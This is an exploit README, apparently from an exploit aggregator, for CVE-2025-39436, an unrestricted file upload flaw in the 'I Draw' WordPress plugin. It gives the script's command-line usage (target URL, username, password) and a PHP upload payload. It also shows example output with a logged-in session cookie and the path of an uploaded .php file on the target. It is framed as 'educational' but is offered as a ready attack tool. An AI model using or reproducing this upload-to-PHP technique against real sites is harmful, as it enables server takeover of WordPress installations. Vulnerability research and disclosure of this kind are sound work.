Share
## https://sploitus.com/exploit?id=56F8949E-69E6-518C-8F8C-AA706442EBC6
# ๐Ÿšจ WordPress Plugin Exploit: CVE-2025-39436

## ๐Ÿ“ Description
An **Unrestricted Upload of File with Dangerous Type** vulnerability exists in the "I Draw" WordPress plugin. This exploit allows attackers to upload malicious files without restriction. The issue impacts **I Draw versions up to 1.0**.

---

## ๐Ÿ› ๏ธ Exploit Details
The exploit leverages the plugin's file upload functionality to execute a PHP payload. Below is the default payload used:

```php
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
```

---

## ๐Ÿš€ Usage
```bash
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD
```

---

## ๐Ÿ’ป Script Output Example
```plaintext
[โœ…] Login successful.
[๐Ÿช] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[โœ…] File uploaded successfully:
[๐Ÿ”—] http://target/wp-content/uploads/2025/4/19/nxploit.php
```

---

## โš ๏ธ Disclaimer
This script is provided for **educational purposes only**. The author takes no responsibility for any misuse or damage caused by this exploit. Use it at your own risk.

---

*By: Nxploited ( Khaled Alenazi )*